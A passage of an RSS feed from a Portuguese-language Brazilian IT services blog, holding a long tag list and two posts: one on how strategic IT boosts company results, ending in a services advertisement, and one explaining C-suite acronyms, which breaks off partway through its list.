<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-4140421351265717972</atom:id><lastBuildDate>Mon, 07 Jul 2025 15:38:31 +0000</lastBuildDate><category>google</category><category>internet</category><category>tecnologia</category><category>brasil</category><category>android</category><category>facebook</category><category>microsoft</category><category>apple</category><category>smartphone</category><category>computadores</category><category>novidade</category><category>virus</category><category>web</category><category>futuro</category><category>megaupload</category><category>seguranca</category><category>compartilhamento</category><category>iphone</category><category>linux</category><category>sistema operacional</category><category>ti</category><category>aplicativo</category><category>cuidados</category><category>ecad</category><category>invasao</category><category>leis</category><category>tablet</category><category>telefone</category><category>cd windows 7</category><category>chrome</category><category>dados</category><category>do YouTube</category><category>eua</category><category>fbi</category><category>fechamento</category><category>mac</category><category>mensagem</category><category>mobile</category><category>mundo</category><category>musica</category><category>pc</category><category>rede</category><category>site</category><category>smartphones</category><category>tablets</category><category>windows</category><category>3g</category><category>amecas</category><category>apps</category><category>arquivos</category><category>atualizacao</category><category>banco</category><category>blog</category><category>celular</category><category>ciencia</category><category>cobranca</category><category>conexao</category><category>contaminacao</category><category>crescimento</category><category>dilma</category><category>dinheiro</category><category>dispositivo movel</category><category>empresas</category><category>fabrica. ipads</category><category>hackers</category><category>informacao</category><category>jogos</category><category>lg</category><category>malware</category><category>navegacao</category><category>navegador</category><category>notebook</category><category>pragas</category><category>projetos</category><category>protecao</category><category>samsung</category><category>senha</category><category>sites</category><category>skype</category><category>smatphones</category><category>software</category><category>trojan</category><category>tv</category><category>wi-fi</category><category>Bing Maps</category><category>Música</category><category>adobe</category><category>adolecente</category><category>amazon</category><category>anuncios</category><category>aplicativos</category><category>ataque</category><category>caligraffiti</category><category>campanha</category><category>cebit</category><category>ceos</category><category>chip</category><category>codigo</category><category>compra on-line</category><category>computador</category><category>conferencia</category><category>direitos autorais</category><category>download</category><category>drive</category><category>economia</category><category>email</category><category>enciclopedia</category><category>estudantes</category><category>evolucao</category><category>firefox</category><category>flash</category><category>ganhos</category><category>governo</category><category>gpu</category><category>gratuito</category><category>historia</category><category>ibm</category><category>informatica</category><category>internet paralizacao</category><category>ipad</category><category>ipads</category><category>jailbreak</category><category>kindle fire</category><category>mercado</category><category>mozilla</category><category>oculos</category><category>operadora</category><category>os x</category><category>paypal</category><category>perigo</category><category>pesquisa</category><category>phishing</category><category>pirataria</category><category>plataforma</category><category>prevencao</category><category>programacao</category><category>publicar</category><category>publicidade</category><category>rede social</category><category>redes sociais</category><category>roubo</category><category>saude</category><category>servico</category><category>sucesso</category><category>telefonia</category><category>televisao</category><category>twitter</category><category>video</category><category>virtual</category><category>worm</category><category>yahoo</category><category>.</category><category>0800</category><category>3d</category><category>Antena 1 rio</category><category>Bing Maps Streetside</category><category>Excel 2007</category><category>Rádio</category><category>Tempo e Temperatura</category><category>abuso</category><category>acabar</category><category>aceitacao</category><category>acesso</category><category>acusacao</category><category>adaptacao</category><category>adroid</category><category>adsl</category><category>aids</category><category>alicia</category><category>alunos</category><category>amd</category><category>ameaças</category><category>amr</category><category>analise</category><category>aniversario</category><category>anonymous</category><category>antifurto</category><category>antivirus</category><category>anuncia</category><category>apache</category><category>apagar dados</category><category>aparelho</category><category>aple</category><category>app store</category><category>aproveitador</category><category>armazenamento</category><category>assombrar</category><category>asus</category><category>atores</category><category>aumento</category><category>avanco</category><category>azure</category><category>backcone</category><category>baco</category><category>banco centra</category><category>banda larga</category><category>barulho</category><category>bateria</category><category>bcm21654g</category><category>bill gates</category><category>biografia</category><category>bioterrorismo</category><category>bit torrent</category><category>blackberry</category><category>blogueiro</category><category>bloomberg</category><category>bloqueio</category><category>botao</category><category>brechas</category><category>broadcom</category><category>browser</category><category>bug</category><category>busca</category><category>buscador</category><category>calendario</category><category>calor</category><category>camara</category><category>camera</category><category>caminhar</category><category>campina grande</category><category>camuflado</category><category>cancer</category><category>cantora</category><category>cardiacos</category><category>carly</category><category>carros</category><category>cartao</category><category>casamento</category><category>cavalo de troia</category><category>celebridade</category><category>celulares</category><category>censura</category><category>centralizacao</category><category>ceo</category><category>cetralizar</category><category>chamada</category><category>china</category><category>cibernetico</category><category>ciencia. eletronica. futuro</category><category>cientistas</category><category>cio</category><category>cliente</category><category>clipes</category><category>cload</category><category>cloud</category><category>cnn</category><category>cobol</category><category>cobrancas</category><category>codigo barras</category><category>codigo qr</category><category>comercializacao</category><category>como e mail</category><category>companhias</category><category>compartilhar</category><category>compatibilidades</category><category>compra</category><category>compras</category><category>comunicacao</category><category>confidencial</category><category>constituicao</category><category>consulta</category><category>consumo</category><category>contato</category><category>conversa</category><category>copia</category><category>coracao</category><category>coronarias</category><category>cpu</category><category>credito</category><category>crhome</category><category>criador</category><category>criadora</category><category>criancas</category><category>crime</category><category>criminoso virtual</category><category>crise</category><category>csn</category><category>cultura</category><category>cura</category><category>curiosidade</category><category>curtir</category><category>cyber</category><category>danos</category><category>data centers</category><category>datacenters</category><category>ddos</category><category>deprecao</category><category>descoberta</category><category>desenvolvimento</category><category>desistir</category><category>desktop</category><category>destaque</category><category>distribuicao</category><category>divulgar</category><category>dominio</category><category>dotcom</category><category>download office 2010</category><category>e-commerce</category><category>ecologico</category><category>educacao</category><category>empresas usando tablet pcs</category><category>encripatar</category><category>encriptacao</category><category>engine</category><category>episodio</category><category>equipamento robusto</category><category>equipamentos</category><category>equipamentos com mobilidade</category><category>espaco</category><category>estados unidos</category><category>estrategia</category><category>estudo</category><category>europa</category><category>evento</category><category>excel</category><category>excel 2010</category><category>exercicios</category><category>existencia</category><category>extencao</category><category>f-commerce</category><category>fabricante</category><category>facilidades</category><category>fazenda</category><category>ferramenta</category><category>ferromagnetica</category><category>fileserve</category><category>filmes</category><category>fim</category><category>financeiro</category><category>fisco</category><category>foxconn</category><category>franca</category><category>freebsd</category><category>funcionalidade</category><category>furto</category><category>gifs</category><category>gingerbread</category><category>glass</category><category>glee</category><category>global</category><category>globalizacao</category><category>gnome</category><category>google x</category><category>gratuidade</category><category>gratuita</category><category>hackintosh</category><category>high tech</category><category>hospedagem</category><category>htc</category><category>html</category><category>html5</category><category>http</category><category>ideia</category><category>importacao</category><category>imprensa</category><category>imunidade</category><category>influencia</category><category>informacoes</category><category>iniciar</category><category>inoperante</category><category>inovacao</category><category>instagran</category><category>intel</category><category>inteligencia</category><category>interatividade</category><category>internauta</category><category>internet explorer</category><category>ipod</category><category>ipods</category><category>isp</category><category>jeitinho</category><category>jogo</category><category>juiza</category><category>justica</category><category>justin</category><category>keyloggers</category><category>kindle 3g</category><category>kinect</category><category>leopard</category><category>ligacao</category><category>linguagem</category><category>link</category><category>linus torvalds</category><category>live</category><category>livro</category><category>lojas</category><category>lte</category><category>maca</category><category>macbook</category><category>maiframe</category><category>mail</category><category>maisme</category><category>malicioso</category><category>manutencao</category><category>mapas</category><category>maquinas</category><category>maratona</category><category>marca</category><category>materia</category><category>matrimonio</category><category>mecanismo</category><category>medicos</category><category>megabox</category><category>melhorias</category><category>messeger</category><category>midoa</category><category>mobilidade</category><category>modens</category><category>morte</category><category>motivcao</category><category>motoristas</category><category>mountain</category><category>mudancas</category><category>mundo digital</category><category>musical</category><category>mutacao</category><category>navegadores</category><category>negocios</category><category>neozelandesa</category><category>netscape</category><category>nfc</category><category>nightly</category><category>nokia</category><category>novidades</category><category>novo</category><category>novo windows</category><category>nuvens</category><category>oakley</category><category>off line</category><category>office</category><category>oi</category><category>online</category><category>openoffice</category><category>original</category><category>orion</category><category>orkut</category><category>outlook</category><category>outsourcing</category><category>ozzie</category><category>pagamento</category><category>pagamentos</category><category>pagar</category><category>palestra</category><category>parceria</category><category>pdf</category><category>performance</category><category>petrobras</category><category>phone</category><category>phone. google</category><category>pipa</category><category>piratas</category><category>planalto</category><category>plataforma futuro windows8</category><category>poder</category><category>polaroid</category><category>pontuacao</category><category>portas</category><category>possibilidade</category><category>preco</category><category>preocupacao</category><category>privacidade</category><category>problemas</category><category>processador</category><category>processadores</category><category>processamento</category><category>produtividade</category><category>profissionais</category><category>programa</category><category>programas</category><category>proibido</category><category>proposta</category><category>provedores</category><category>publicacao</category><category>pyhthon</category><category>radio</category><category>ranking</category><category>reader</category><category>realidade</category><category>realidade virtual</category><category>reconhecimento</category><category>referencia</category><category>refrigeracao</category><category>remuneracao</category><category>renda</category><category>reputacao</category><category>respostas</category><category>retransmissao</category><category>reverendo</category><category>revolucao</category><category>rh</category><category>rihanna</category><category>robos</category><category>robot</category><category>roda viva</category><category>routers</category><category>ruby</category><category>safari</category><category>sao paulo</category><category>satelite</category><category>satisfacao</category><category>score</category><category>search</category><category>secretaria</category><category>sedentarios</category><category>seguraca</category><category>seguramca</category><category>segurança</category><category>sem fio</category><category>senhas</category><category>sensibilidade</category><category>sentimentos</category><category>servidores</category><category>sistema</category><category>smartphone. perda</category><category>solucao</category><category>sopa</category><category>spam</category><category>spdy</category><category>spyware</category><category>star treck</category><category>staroffice</category><category>steve jobs</category><category>studybook</category><category>submundo</category><category>sun</category><category>sustentabilidade</category><category>tablet PC windows</category><category>tablets de alta disponibilidade</category><category>tablets para empresas</category><category>taiwan</category><category>tatuagem</category><category>tela</category><category>telecomunicacoes</category><category>tendencia</category><category>termino</category><category>top 10</category><category>touch</category><category>trabalho</category><category>transferencia</category><category>transmissao</category><category>transparente</category><category>tristeza</category><category>troca</category><category>trojans</category><category>ubuntu</category><category>ultrabooks</category><category>umbuntu</category><category>unificacao</category><category>universidade</category><category>unix</category><category>upload</category><category>usiminas</category><category>usuarios</category><category>vale</category><category>velocidade</category><category>velox</category><category>versao</category><category>videoconferencia</category><category>virada digital</category><category>virtuais</category><category>visita</category><category>vitimas</category><category>voz</category><category>web 2.0</category><category>webmail</category><category>wikipedia</category><category>windowa</category><category>windows 8</category><category>word</category><category>wupload</category><category>x64</category><category>x86</category><category>xp</category><category>you tube</category><category>youtube</category><category>zumbi</category><category>zynga</category><title>Computers Service Informática</title><description> A Computers Service Informática é uma empresa que atua no mercado desde a década de 80, prestando serviços tanto para empresas como para usuários particulares&#xa;&#xa;Comprometida com um rigoroso padrão de qualidade, a Computers Service Informática oferece um atendimento ágil e personalizado. Nossa grande experiência nos diversos setores da informática nos ajuda a identificar com clareza as necessidades de sua empresa, e propor soluções simples e inteligentes que atendam aos requisitos do seu negócio.</description><link>http://computersservicetecnica.blogspot.com/</link><managingEditor>noreply@blogger.com (Computers Service Informática)</managingEditor><generator>Blogger</generator><openSearch:totalResults>285</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-8459181886114091925</guid><pubDate>Mon, 05 Nov 2018 00:22:00 +0000</pubDate><atom:updated>2018-11-04T22:24:20.848-02:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;

&lt;span style=&quot;font-size: 28px;&quot;&gt;TI estratégico: como a tecnologia impulsiona os resultados da empresa?&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBvfjHosQSef90kBmps_UZxOjbLkHm2NIZHj86uWO-tmtfF9KLHSFlLdPMLyFJDpKp3yiITsmcXMRAObeJXgE-XJCxMqJ5ZKv9CBSymDv32sa7Dx2wDz-_xv4Y4bjpm4inLN7lKhyfLc/s1600/21.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;246&quot; data-original-width=&quot;300&quot; height=&quot;328&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBvfjHosQSef90kBmps_UZxOjbLkHm2NIZHj86uWO-tmtfF9KLHSFlLdPMLyFJDpKp3yiITsmcXMRAObeJXgE-XJCxMqJ5ZKv9CBSymDv32sa7Dx2wDz-_xv4Y4bjpm4inLN7lKhyfLc/s400/21.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Hoje, a dinâmica das informações é contínua, e a todo momento um grande volume de dados circula por todas as partes. Neste contexto, um setor de TI estratégico tornou-se fundamental para o sucesso das operações, pois otimiza a gestão, o planejamento e a organização, transformando os dados em ativos valiosos dentro e fora das empresas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Graças aos avanços da tecnologia e da mudança dos nossos hábitos, demandou-se uma nova postura das corporações no que se refere à presença e relevância desse setor, principalmente porque a utilização das informações na estratégia de negócios passou a ser uma necessidade.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;1. Otimização de processos&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Quem conhece bem a rotina de operações de uma empresa sabe que existem inúmeros processos que recebem o auxílio de recursos tecnológicos. Por meio de ferramentas de ponta, é possível otimizar a execução de diversos tipos de atividades, das mais simples às mais elaboradas.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Atualmente, são visíveis os benefícios do desenvolvimento e implementação de novas soluções, como sistemas e softwares de gestão, CRM, cloud computing e tecnologias mobile.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Tudo isso contribui para um ambiente de trabalho mais eficiente e voltado para a utilização da informação. Além disso, a tecnologia facilita muito a vida do trabalhador. Ao ser beneficiado com dispositivos e recursos que facilitam as suas tarefas — como os mecanismos de automação, por exemplo —, é possível tornar os processos mais seguros, ágeis e produtivos.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;2. Integração&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Impulsionar os resultados da empresa depende da união de esforços de diferentes setores. No intuito de se ter uma visão mais ampliada da situação, uma tomada de decisão acertada passa pelo crivo de diversas pessoas. Nesse ponto, a tecnologia também tem dado a sua contribuição.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
A grande integração promovida por sistemas informatizados e pela facilidade na comunicação e compartilhamento de dados e informações comprovam o alto nível de interação existente dentro das empresas e em relação ao ambiente externo.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
De modo geral, isso só é possível quando a empresa entende e valoriza a importância da inovação para os negócios. O mercado é dinâmico, não espera por respostas e decisões, e por isso inovar é tão importante.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Embora não seja o único fator capaz de proporcioná-la, a tecnologia tem um grande apelo pela inovação. A partir dos seus conceitos e soluções, é plenamente possível estabelecer um ambiente empresarial integrado e pautado em metas reais, já que o nível de conhecimento e a precisão que se tem a respeito da empresa é muito mais profunda, deixando o negócio mais simples de ser controlado.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;3. Segurança da informação&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Por fim, não podemos deixar de considerar o quão importante é o TI estratégico na segurança das operações. Além de fornecer os meios para se atingir uma otimização da rotina, essa estratégia oferece também os caminhos para uma gestão de dados e informação muito mais segura.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Hoje, falamos em computação em nuvem, criptografia, redes privadas e uma infinidade de soluções que garantem a segurança digital do negócio. Afinal, confirmando o exposto no início deste post, as informações se tornaram ativos valiosos para as corporações, razão pela qual a sua segurança é primordial.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Como você viu, é notório como um setor de TI estratégico agrega valor à rotina das empresas. Seja otimizando processos, alinhando a atuação com as demandas mais atuais ou fortalecendo a segurança da organização, a tecnologia é, sem dúvida alguma, um elemento muito estratégico na hora de impulsionar a empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2L0IRxbH7Smj28QnyxSJv0ZNGPTeLpGVed975kIdFHft6F7K8RGF6fbH13UKAzfWQA1n2aKWru3XuRCVOutIdp6DWUOoCHUawoU94dV_0TAX6x-g_lGiJTKxITBDd5LUSlhSXkFTVzrc/s1600/39.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;500&quot; data-original-width=&quot;800&quot; height=&quot;250&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2L0IRxbH7Smj28QnyxSJv0ZNGPTeLpGVed975kIdFHft6F7K8RGF6fbH13UKAzfWQA1n2aKWru3XuRCVOutIdp6DWUOoCHUawoU94dV_0TAX6x-g_lGiJTKxITBDd5LUSlhSXkFTVzrc/s400/39.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: 40px;&quot;&gt;Sua TI Está Com Problemas?&lt;/span&gt;&lt;/h2&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• O e-mail travou
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• A internet / Wi-Fi não está funcionando corretamente
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• Lentidão no computador ou no servidor
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• Está com medo de perder todos os dados
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• O banco de dados do sistema está parado
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• Sua rede de dados está com problemas de segurança
&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• Está com problemas com sua atual equipe de TI 
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3-HfW_Fo6kJ-2mG9iB8G68TbvVlZM7tdYbNuSxhRoIoNUhXwD-DCqVf-oIajhRwZ1dwUZNNlmoGnJfQcUGjYTjyYMvTSVZlw9DhLSRM0DIdXUvhKgF9K13X0a52Pi6vAU98OU2y6D6aA/s1600/97.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;902&quot; data-original-width=&quot;1402&quot; height=&quot;256&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3-HfW_Fo6kJ-2mG9iB8G68TbvVlZM7tdYbNuSxhRoIoNUhXwD-DCqVf-oIajhRwZ1dwUZNNlmoGnJfQcUGjYTjyYMvTSVZlw9DhLSRM0DIdXUvhKgF9K13X0a52Pi6vAU98OU2y6D6aA/s400/97.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;Você Sabe O Que Fazer Se Tudo Estiver Parado!&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Se sua empresa ficasse sem poder usar parte, ou mesmo todo os seus equipamentos e sistemas? Certamente seu prejuízo seria grande!&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Para solucionar esses e outros problemas ligados à sua infraestrutura de TI, conte com a equipe de especialistas da Computers Service Informática!&lt;/div&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;Por Que Escolher a Computers Service Informática?&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Desde 1985 a Computers Service Informática trabalha
para minimizar os problemas de infraestrutura de TI de seus Clientes.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Nossa equipe é altamente qualificada e experiente, utilizamos as boas práticas ITIL e temos como foco o sucesso e interesses dos nossos Clientes.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;Gerenciamos Seus Serviços de TI Para Você Ter Mais Tempo Para Cuidar Do Seu Negócio&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Temos um modelo de contrato ajustado à necessidade da sua empresa, entre em contato, teremos prazer em atendê-lo.&lt;/div&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span style=&quot;font-size: 24px;&quot;&gt;Alguns dos Nossos Serviços de Infraestrutura&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Atendimento remoto – telefônico e internet&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Atendimento presencial&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Configuração de firewall, proxy, routers, switches, e VPN&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Controle de acessos a servidores e internet&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Criação de Rotinas de Backup e Remoção de Vírus&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Help Desk&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Instalação e manutenção de equipamentos de TI&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Instalação, administração e manutenção de Servidores (físicos e virtuais)&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Instalação, Configuração e Monitoramento de Redes&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Inventário de Hardware e Software&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Otimização de Sistema Operacional&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Suporte em Informática, e em rede wireless&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Suporte e Consultoria em TI&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Suporte na escolha do hardware&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Suporte aos Usuários&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Suporte para decisões estratégicas de TI&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Gerenciamento de Serviços de TI&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
•  Administração e suporte de toda sua Informática&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Entre em contato, faça um orçamento, estamos esperando por você!

&lt;br /&gt;
&lt;br /&gt;</description><link>http://computersservicetecnica.blogspot.com/2018/11/ti-estrategico-como-tecnologia.html</link><author>noreply@blogger.com (Computers Service Informática)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBvfjHosQSef90kBmps_UZxOjbLkHm2NIZHj86uWO-tmtfF9KLHSFlLdPMLyFJDpKp3yiITsmcXMRAObeJXgE-XJCxMqJ5ZKv9CBSymDv32sa7Dx2wDz-_xv4Y4bjpm4inLN7lKhyfLc/s72-c/21.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4140421351265717972.post-7346922292070800357</guid><pubDate>Tue, 21 Aug 2018 15:38:00 +0000</pubDate><atom:updated>2018-08-21T12:38:36.687-03:00</atom:updated><title></title><description>&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;CEO, CFO, CIO: afinal, o que estas siglas significam?&lt;/span&gt;&lt;/h2&gt;
&lt;h1 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 14px;&quot;&gt;As nomenclaturas que se consolidam cada vez mais no mundo corporativo&lt;/span&gt;&lt;/h1&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6b4YgxLnOzr7jIpEtD-pDfFYV3WUPXSyN4xKr1qO8E-HfPenpuRosgMlaAM3kckzxs4dF9qjApn0sczK25RxTsHpbZwrVqMtccL2oHdecyGqdh-otclh_f2rrJcNceCHWhuHiXl_xF4/s1600/CEO.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1067&quot; data-original-width=&quot;1600&quot; height=&quot;266&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW6b4YgxLnOzr7jIpEtD-pDfFYV3WUPXSyN4xKr1qO8E-HfPenpuRosgMlaAM3kckzxs4dF9qjApn0sczK25RxTsHpbZwrVqMtccL2oHdecyGqdh-otclh_f2rrJcNceCHWhuHiXl_xF4/s400/CEO.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Elas tornaram-se bastante comuns quando o assunto são diretores de grandes empresas. Cada uma designa um cargo distinto, mas, afinal, você sabe o que as siglas do mundo corporativo querem dizer?&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
As nomenclaturas representam o chamado ‘nível C’ (do inglês C-Level ou C-Suite), devido à primeira letra destas siglas, que significa a palavra “chefe”. O significado completo é “Chief ______ Officer”, com o espaço em branco representando a área da empresa que a pessoa chefia.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Então, quando se deparar com alguma sigla do tipo, saiba que se trata do ‘manda-chuva’ de determinada área de uma empresa.&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: 20px;&quot;&gt;&lt;b&gt;Conheça o significado das principais siglas:&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CEO (Chief Executive Officer) – É a mais conhecida de todas. Trata-se do presidente-executivo ou diretor geral de uma empresa. Pode ser considerado também o ‘chefão’ de uma companhia, mas deve responder ao quadro de diretores. Alguns nomes consagrados que ocuparam este cargo foram Steve Jobs, hoje substituído por Tim Cook na Apple, e Steve Ballmer na Microsoft.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CFO (Chief Financial Officer) – Diretor financeiro. Comanda as finanças da empresa e controla as metas, objetivos e orçamentos. Cuidam dos investimentos, além de supervisionar o capital da companhia.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• COO (Chief Operation Officer) – Diretor operacional. Espécie de braço direito do CEO, que coordena mais de perto as rotinas de uma companhia. Dependendo da empresa, pode até carregar o título de presidente.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CMO (Chief Marketing Officer) – Diretor de marketing. Como o nome já diz, responsável por comandar as ações de marketing de uma organização.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
• CPO (Chief Product Officer) – Diretor de produtos. Comanda as atividades relativas aos produtos da empresa, como a concepção, o projeto e sua produção.&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
